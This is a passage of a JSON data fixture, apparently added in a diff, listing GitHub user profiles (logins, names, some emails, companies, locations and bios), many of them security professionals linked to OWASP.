+ "following_count": 20, + "followers_count": 28, + "public_gists_count": 13, + "public_repositories_count": 92, + "created_at": "2012-06-25T14:29:59Z", + "updated_at": "2024-08-13T11:19:31Z", + "node_id": "MDQ6VXNlcjE4ODk5NzM=", + "bio": "Principal Technologist @madetech.", + "is_hireable": false, + "twitter_username": "craigjbass" + } +}, +{ + "model": "github.user", + "pk": 320, + "fields": { + "nest_created_at": "2024-09-11T21:11:16.736Z", + "nest_updated_at": "2024-09-11T21:11:17.131Z", + "name": "", + "login": "aditya6298", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38376053?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-04-14T10:53:50Z", + "updated_at": "2023-11-24T02:16:25Z", + "node_id": "MDQ6VXNlcjM4Mzc2MDUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 321, + "fields": { + "nest_created_at": "2024-09-11T21:11:19.233Z", + "nest_updated_at": "2024-09-22T19:49:27.054Z", + "name": "Shlomo Zalman Heigh", + "login": "szh", + "email": "shlomozalmanheigh@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/546965?v=4", + "company": "@cyberark @conjurinc ", + "location": "United States", + "collaborators_count": 0, + "following_count": 71, + "followers_count": 46, + "public_gists_count": 3, + "public_repositories_count": 44, + "created_at": "2011-01-04T13:18:47Z", + "updated_at": "2024-09-08T14:36:56Z", + "node_id": "MDQ6VXNlcjU0Njk2NQ==", + "bio": "Open Source Enthusiast. AppSec expert. Senior Software Engineer @cyberark ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 322, + "fields": { + "nest_created_at": "2024-09-11T21:11:21.441Z", + "nest_updated_at": "2024-09-22T20:25:18.618Z", + "name": "Josh Grossman", + "login": "tghosth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13623828?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 51, + "public_gists_count": 1, + "public_repositories_count": 77, + "created_at": "2015-08-03T11:38:40Z", + "updated_at": "2024-09-19T08:31:05Z", + "node_id": "MDQ6VXNlcjEzNjIzODI4", + "bio": "InfoSec Consultant | Sometimes known as TGhostH | Based in Silicon Wadi | Cyber is an adjective | You wanna break it? You'd better know how to fix it!", + "is_hireable": false, + "twitter_username": "JoshCGrossman" + } +}, +{ + "model": "github.user", + "pk": 323, + "fields": { + "nest_created_at": "2024-09-11T21:11:21.840Z", + "nest_updated_at": "2024-09-11T21:11:21.840Z", + "name": "Sambhav Dixit", + "login": "sambhavnoobcoder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/94298612?v=4", + "company": "", + "location": "Bhopal", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 64, + "created_at": "2021-11-14T13:13:26Z", + "updated_at": "2024-09-05T16:20:42Z", + "node_id": "U_kgDOBZ7h9A", + "bio": "", + "is_hireable": false, + "twitter_username": "sambhavdixitpro" + } +}, +{ + "model": "github.user", + "pk": 324, + "fields": { + "nest_created_at": "2024-09-11T21:11:23.064Z", + "nest_updated_at": "2024-09-22T20:24:28.957Z", + "name": "Mehmet Leblebici", + "login": "mleblebici", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19292195?v=4", + "company": "TomTom International", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2016-05-10T18:23:44Z", + "updated_at": "2023-12-31T14:56:27Z", + "node_id": "MDQ6VXNlcjE5MjkyMTk1", + "bio": "Senior Security Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 325, + "fields": { + "nest_created_at": "2024-09-11T21:11:25.117Z", + "nest_updated_at": "2024-09-22T19:49:32.417Z", + "name": "", + "login": "wittjoe1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147606163?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-10-11T09:53:53Z", + "updated_at": "2024-08-20T19:48:00Z", + "node_id": "U_kgDOCMxKkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 326, + "fields": { + "nest_created_at": "2024-09-11T21:11:27.163Z", + "nest_updated_at": "2024-09-22T20:22:10.741Z", + "name": "S", + "login": "SCFTW", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/159332571?v=4", + "company": "", + "location": "Minneapolis, MN", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-02-07T19:16:04Z", + "updated_at": "2024-05-30T18:31:31Z", + "node_id": "U_kgDOCX842w", + "bio": "Infosec Architect currently focused on Customer Identity/Authentication", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 327, + "fields": { + "nest_created_at": "2024-09-11T21:11:29.331Z", + "nest_updated_at": "2024-09-22T19:49:27.691Z", + "name": "Conrad Bhuiyan-Volkoff", + "login": "otkd", + "email": "conrad.bhuiyanvolkoff@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/7527203?v=4", + "company": "@robinhoodmarkets ", + "location": "Toronto, Canada", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 38, + "created_at": "2014-05-08T19:30:40Z", + "updated_at": "2024-06-12T01:13:25Z", + "node_id": "MDQ6VXNlcjc1MjcyMDM=", + "bio": "Senior Systems Developer | CISSP | CCSP", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 328, + "fields": { + "nest_created_at": "2024-09-11T21:11:37.788Z", + "nest_updated_at": "2024-09-22T20:24:00.845Z", + "name": "Kelly Marchewa", + "login": "EbonyAdder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12820072?v=4", + "company": "", + "location": "Missouri, US", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-06-09T20:38:21Z", + "updated_at": "2023-10-25T01:23:53Z", + "node_id": "MDQ6VXNlcjEyODIwMDcy", + "bio": "I am a software developer with a passion for cybersecurity. I hold a MS in IT and CEH, CSSLP, and CompTIA CySA+ certifications. Java is my preferred language.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 329, + "fields": { + "nest_created_at": "2024-09-11T21:11:39.902Z", + "nest_updated_at": "2024-09-11T21:11:39.902Z", + "name": "Christian Marg", + "login": "einhirn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/189249?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2010-01-25T08:33:48Z", + "updated_at": "2024-08-29T13:29:55Z", + "node_id": "MDQ6VXNlcjE4OTI0OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 330, + "fields": { + "nest_created_at": "2024-09-11T21:11:41.955Z", + "nest_updated_at": "2024-09-11T21:11:42.359Z", + "name": "Godfrey Nolan", + "login": "godfreynolan", + "email": "godfrey@riis.com", + "avatar_url": "https://avatars.githubusercontent.com/u/658383?v=4", + "company": "RIIS LLC", + "location": "Southfield, MI", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 71, + "public_gists_count": 0, + "public_repositories_count": 52, + "created_at": "2011-03-08T19:33:26Z", + "updated_at": "2024-09-03T13:53:35Z", + "node_id": "MDQ6VXNlcjY1ODM4Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 331, + "fields": { + "nest_created_at": "2024-09-11T21:11:44.028Z", + "nest_updated_at": "2024-09-11T21:11:44.028Z", + "name": "", + "login": "Tib3rius", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48113936?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1450, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2019-03-01T04:25:07Z", + "updated_at": "2024-08-29T20:11:24Z", + "node_id": "MDQ6VXNlcjQ4MTEzOTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 332, + "fields": { + "nest_created_at": "2024-09-11T21:11:46.117Z", + "nest_updated_at": "2024-09-12T02:28:34.648Z", + "name": "Robin", + "login": "rjacobs-CityOfWichita", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42586362?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-08-21T18:32:08Z", + "updated_at": "2024-08-14T22:34:09Z", + "node_id": "MDQ6VXNlcjQyNTg2MzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 333, + "fields": { + "nest_created_at": "2024-09-11T21:11:48.230Z", + "nest_updated_at": "2024-09-20T17:34:16.990Z", + "name": "Troy B", + "login": "miiiak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81539149?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-03-28T23:56:51Z", + "updated_at": "2024-09-06T19:52:25Z", + "node_id": "MDQ6VXNlcjgxNTM5MTQ5", + "bio": "Security engineer at AWS", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 334, + "fields": { + "nest_created_at": "2024-09-11T21:11:53.799Z", + "nest_updated_at": "2024-09-22T17:45:07.974Z", + "name": "", + "login": "dmwoods38", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2498490?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2012-10-06T04:40:54Z", + "updated_at": "2024-04-29T01:33:03Z", + "node_id": "MDQ6VXNlcjI0OTg0OTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 335, + "fields": { + "nest_created_at": "2024-09-11T21:11:59.140Z", + "nest_updated_at": "2024-09-11T21:11:59.140Z", + "name": "", + "login": "AshinTop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45983426?v=4", + "company": "", + "location": "HangZhou", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-12-19T00:51:40Z", + "updated_at": "2024-08-14T06:10:25Z", + "node_id": "MDQ6VXNlcjQ1OTgzNDI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 336, + "fields": { + "nest_created_at": "2024-09-11T21:11:59.995Z", + "nest_updated_at": "2024-09-22T19:42:07.744Z", + "name": "", + "login": "mendickxiao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6678485?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 133, + "created_at": "2014-02-14T02:58:28Z", + "updated_at": "2024-07-21T10:03:53Z", + "node_id": "MDQ6VXNlcjY2Nzg0ODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 337, + "fields": { + "nest_created_at": "2024-09-11T21:12:01.647Z", + "nest_updated_at": "2024-09-11T21:12:01.647Z", + "name": "Mohammed ALDOUB", + "login": "Voulnet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1334847?v=4", + "company": "", + "location": "Kuwait, Kuwait City", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 431, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2012-01-16T20:25:09Z", + "updated_at": "2022-11-28T13:29:40Z", + "node_id": "MDQ6VXNlcjEzMzQ4NDc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 338, + "fields": { + "nest_created_at": "2024-09-11T21:12:02.483Z", + "nest_updated_at": "2024-09-11T21:12:02.484Z", + "name": "", + "login": "mathangi28", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87100796?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-07T23:13:48Z", + "updated_at": "2021-10-26T18:29:03Z", + "node_id": "MDQ6VXNlcjg3MTAwNzk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 339, + "fields": { + "nest_created_at": "2024-09-11T21:12:03.306Z", + "nest_updated_at": "2024-09-22T17:45:15.813Z", + "name": "", + "login": "HLOverflow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18380571?v=4", + "company": "", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2016-04-10T15:12:23Z", + "updated_at": "2024-08-13T08:57:09Z", + "node_id": "MDQ6VXNlcjE4MzgwNTcx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 340, + "fields": { + "nest_created_at": "2024-09-11T21:12:20.042Z", + "nest_updated_at": "2024-09-22T19:46:25.739Z", + "name": "Dinis Cruz", + "login": "DinisCruz", + "email": "dinis.cruz@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/656739?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 193, + "public_gists_count": 148, + "public_repositories_count": 79, + "created_at": "2011-03-08T01:23:43Z", + "updated_at": "2024-09-10T21:31:08Z", + "node_id": "MDQ6VXNlcjY1NjczOQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 341, + "fields": { + "nest_created_at": "2024-09-11T21:12:24.585Z", + "nest_updated_at": "2024-09-11T21:12:24.585Z", + "name": "", + "login": "teja7157", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52086248?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-21T20:14:25Z", + "updated_at": "2019-06-24T14:03:04Z", + "node_id": "MDQ6VXNlcjUyMDg2MjQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 342, + "fields": { + "nest_created_at": "2024-09-11T21:12:25.423Z", + "nest_updated_at": "2024-09-22T16:23:49.212Z", + "name": "Ross Young", + "login": "rossayoung", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11811451?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2015-04-06T00:50:44Z", + "updated_at": "2024-09-13T12:34:12Z", + "node_id": "MDQ6VXNlcjExODExNDUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 343, + "fields": { + "nest_created_at": "2024-09-11T21:12:26.242Z", + "nest_updated_at": "2024-09-11T21:12:26.242Z", + "name": "pavankumarbugga", + "login": "pavankumarbugga", + "email": "pavankumar.bugga@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19485672?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2016-05-20T06:34:25Z", + "updated_at": "2023-07-05T17:46:10Z", + "node_id": "MDQ6VXNlcjE5NDg1Njcy", + "bio": "Sr. DevOps Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 344, + "fields": { + "nest_created_at": "2024-09-11T21:12:27.126Z", + "nest_updated_at": "2024-09-22T17:45:37.438Z", + "name": "", + "login": "ambernormand", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31485457?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-08-30T17:29:16Z", + "updated_at": "2022-08-24T14:44:18Z", + "node_id": "MDQ6VXNlcjMxNDg1NDU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 345, + "fields": { + "nest_created_at": "2024-09-11T21:12:27.942Z", + "nest_updated_at": "2024-09-11T21:12:28.794Z", + "name": "Sagar V S", + "login": "sagarvsh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23294710?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 56, + "created_at": "2016-11-06T14:42:54Z", + "updated_at": "2024-09-03T11:41:50Z", + "node_id": "MDQ6VXNlcjIzMjk0NzEw", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 346, + "fields": { + "nest_created_at": "2024-09-11T21:12:29.600Z", + "nest_updated_at": "2024-09-11T21:12:29.600Z", + "name": "John Krull", + "login": "Asuza", + "email": "astrom.flux@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/658248?v=4", + "company": "@LiveWatch ", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 42, + "created_at": "2011-03-08T18:28:07Z", + "updated_at": "2024-01-09T23:18:20Z", + "node_id": "MDQ6VXNlcjY1ODI0OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 347, + "fields": { + "nest_created_at": "2024-09-11T21:12:30.434Z", + "nest_updated_at": "2024-09-22T17:38:36.111Z", + "name": "cr0hn", + "login": "cr0hn", + "email": "cr0hn@cr0hn.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4076390?v=4", + "company": "", + "location": "Manchester ", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 605, + "public_gists_count": 17, + "public_repositories_count": 161, + "created_at": "2013-04-06T09:59:00Z", + "updated_at": "2024-09-07T07:59:45Z", + "node_id": "MDQ6VXNlcjQwNzYzOTA=", + "bio": "Cybersecurity is a tricky business. I’m a freelancer helping companies avoid nasty surprises", + "is_hireable": true, + "twitter_username": "ggdaniel" + } +}, +{ + "model": "github.user", + "pk": 348, + "fields": { + "nest_created_at": "2024-09-11T21:12:33.463Z", + "nest_updated_at": "2024-09-22T17:45:39.186Z", + "name": "", + "login": "d3jk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29552489?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-06-19T19:06:17Z", + "updated_at": "2023-04-06T22:00:06Z", + "node_id": "MDQ6VXNlcjI5NTUyNDg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 349, + "fields": { + "nest_created_at": "2024-09-11T21:12:36.734Z", + "nest_updated_at": "2024-09-22T17:45:38.873Z", + "name": "Simeon Cloutier", + "login": "SimeonCloutier", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31997026?v=4", + "company": "Allstate", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-09-15T17:28:44Z", + "updated_at": "2020-10-09T19:16:17Z", + "node_id": "MDQ6VXNlcjMxOTk3MDI2", + "bio": "OWASP SEDATED Project Lead, Lead Application Security Engineer @ Allstate.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 350, + "fields": { + "nest_created_at": "2024-09-11T21:12:51.621Z", + "nest_updated_at": "2024-09-11T21:12:51.621Z", + "name": "Lukas Grams", + "login": "gramsimamsi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32511256?v=4", + "company": "IU Internationale Hochschule", + "location": "Mosbach, Baden-Württemberg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2017-10-04T10:05:09Z", + "updated_at": "2021-06-17T07:05:32Z", + "node_id": "MDQ6VXNlcjMyNTExMjU2", + "bio": "Security Architect, endangered to fall down into many technological rabbit holes.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 351, + "fields": { + "nest_created_at": "2024-09-11T21:12:55.015Z", + "nest_updated_at": "2024-09-22T20:30:00.159Z", + "name": "Sebastian Pipping", + "login": "hartwork", + "email": "sebastian@pipping.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1577132?v=4", + "company": "", + "location": "Berlin, Europe", + "collaborators_count": 0, + "following_count": 217, + "followers_count": 241, + "public_gists_count": 24, + "public_repositories_count": 188, + "created_at": "2012-03-26T17:34:21Z", + "updated_at": "2024-09-21T11:24:08Z", + "node_id": "MDQ6VXNlcjE1NzcxMzI=", + "bio": "If you enjoy my Open Source work, please consider donating to the Free Software Foundation Europe (FSFE).", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 352, + "fields": { + "nest_created_at": "2024-09-11T21:12:57.093Z", + "nest_updated_at": "2024-09-22T20:25:41.182Z", + "name": "Javi", + "login": "javixeneize", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12761574?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2015-06-05T10:55:38Z", + "updated_at": "2024-08-17T19:28:36Z", + "node_id": "MDQ6VXNlcjEyNzYxNTc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 353, + "fields": { + "nest_created_at": "2024-09-11T21:12:57.903Z", + "nest_updated_at": "2024-09-22T20:27:24.715Z", + "name": "Raphael Hagi", + "login": "raphaelhagi", + "email": "raphaelhagi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14099181?v=4", + "company": "", + "location": "Belo Horizonte", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2015-09-02T20:25:52Z", + "updated_at": "2024-08-21T16:47:46Z", + "node_id": "MDQ6VXNlcjE0MDk5MTgx", + "bio": "OWASP, DEVOPS, AppSec, LGPD", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 354, + "fields": { + "nest_created_at": "2024-09-11T21:13:02.267Z", + "nest_updated_at": "2024-09-22T19:42:13.903Z", + "name": "Patrick Dwyer", + "login": "coderpatros", + "email": "patrick.dwyer@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1233546?v=4", + "company": "", + "location": "Australia", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 57, + "public_gists_count": 3, + "public_repositories_count": 75, + "created_at": "2011-12-01T13:58:32Z", + "updated_at": "2024-09-16T03:35:37Z", + "node_id": "MDQ6VXNlcjEyMzM1NDY=", + "bio": "OWASP CycloneDX Project Co-Lead", + "is_hireable": true, + "twitter_username": "coderpatros" + } +}, +{ + "model": "github.user", + "pk": 355, + "fields": { + "nest_created_at": "2024-09-11T21:13:03.120Z", + "nest_updated_at": "2024-09-22T20:29:57.420Z", + "name": "", + "login": "qitian100", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14267459?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 60, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-09-14T02:43:53Z", + "updated_at": "2024-06-11T06:10:30Z", + "node_id": "MDQ6VXNlcjE0MjY3NDU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 356, + "fields": { + "nest_created_at": "2024-09-11T21:13:11.510Z", + "nest_updated_at": "2024-09-22T20:26:42.703Z", + "name": "Marcin Hoppe", + "login": "MarcinHoppe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/475629?v=4", + "company": "Attio", + "location": "Gdansk, Poland", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 53, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2010-11-10T12:27:36Z", + "updated_at": "2024-06-03T07:56:27Z", + "node_id": "MDQ6VXNlcjQ3NTYyOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "marcin_hoppe" + } +}, +{ + "model": "github.user", + "pk": 357, + "fields": { + "nest_created_at": "2024-09-11T21:13:20.866Z", + "nest_updated_at": "2024-09-22T20:25:43.398Z", + "name": "Cesar Kohl", + "login": "cesarkohl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1817443?v=4", + "company": "As One", + "location": "Global", + "collaborators_count": 0, + "following_count": 42, + "followers_count": 18, + "public_gists_count": 83, + "public_repositories_count": 49, + "created_at": "2012-06-05T00:55:25Z", + "updated_at": "2024-09-11T14:59:58Z", + "node_id": "MDQ6VXNlcjE4MTc0NDM=", + "bio": "", + "is_hireable": true, + "twitter_username": "cesar_kohl" + } +}, +{ + "model": "github.user", + "pk": 358, + "fields": { + "nest_created_at": "2024-09-11T21:13:22.197Z", + "nest_updated_at": "2024-09-22T20:26:42.050Z", + "name": "Tal Melamed", + "login": "4ppsec", + "email": "github@appsec.it", + "avatar_url": "https://avatars.githubusercontent.com/u/3397452?v=4", + "company": "cloudessence.io", + "location": "ISR | ITA", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 52, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2013-01-27T14:20:30Z", + "updated_at": "2024-06-17T12:12:09Z", + "node_id": "MDQ6VXNlcjMzOTc0NTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "4ppsec" + } +}, +{ + "model": "github.user", + "pk": 359, + "fields": { + "nest_created_at": "2024-09-11T21:13:29.875Z", + "nest_updated_at": "2024-09-22T19:37:22.469Z", + "name": "Max Ludwig", + "login": "dAnjou", + "email": "mail@danjou.de", + "avatar_url": "https://avatars.githubusercontent.com/u/117147?v=4", + "company": "", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 5, + "public_repositories_count": 38, + "created_at": "2009-08-19T18:21:01Z", + "updated_at": "2023-06-27T11:59:21Z", + "node_id": "MDQ6VXNlcjExNzE0Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 360, + "fields": { + "nest_created_at": "2024-09-11T21:13:38.136Z", + "nest_updated_at": "2024-09-22T20:27:15.155Z", + "name": "Ali Razmjoo", + "login": "Ali-Razmjoo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7676267?v=4", + "company": "@owasp, @zdresearch, @SECOLOGIST ", + "location": "Stockholm", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 226, + "public_gists_count": 10, + "public_repositories_count": 17, + "created_at": "2014-05-23T05:27:04Z", + "updated_at": "2024-08-21T18:33:53Z", + "node_id": "MDQ6VXNlcjc2NzYyNjc=", + "bio": "@OWASP Chapter/Project Leader", + "is_hireable": false, + "twitter_username": "AliRazmjooQa" + } +}, +{ + "model": "github.user", + "pk": 361, + "fields": { + "nest_created_at": "2024-09-11T21:13:39.400Z", + "nest_updated_at": "2024-09-11T21:13:39.400Z", + "name": "", + "login": "kashmax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103031165?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-04-05T08:52:39Z", + "updated_at": "2023-08-30T06:23:13Z", + "node_id": "U_kgDOBiQhfQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 362, + "fields": { + "nest_created_at": "2024-09-11T21:13:40.649Z", + "nest_updated_at": "2024-09-22T20:27:08.729Z", + "name": "Mrigank Anand", + "login": "spiderxm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53966291?v=4", + "company": "", + "location": "Banglore", + "collaborators_count": 0, + "following_count": 99, + "followers_count": 146, + "public_gists_count": 0, + "public_repositories_count": 137, + "created_at": "2019-08-10T08:21:46Z", + "updated_at": "2024-08-26T11:59:48Z", + "node_id": "MDQ6VXNlcjUzOTY2Mjkx", + "bio": "GSoC'22@OWASP\r\nEx-SDE Intern BharatPe, Eugenie.ai, Trell\r\nGSoC'21@OWASP", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 363, + "fields": { + "nest_created_at": "2024-09-11T21:13:42.764Z", + "nest_updated_at": "2024-09-22T19:24:16.547Z", + "name": "Sumukh Chitloor", + "login": "sumukhchitloor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72266248?v=4", + "company": "", + "location": "Bengaluru", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2020-10-02T14:37:54Z", + "updated_at": "2024-09-13T17:59:31Z", + "node_id": 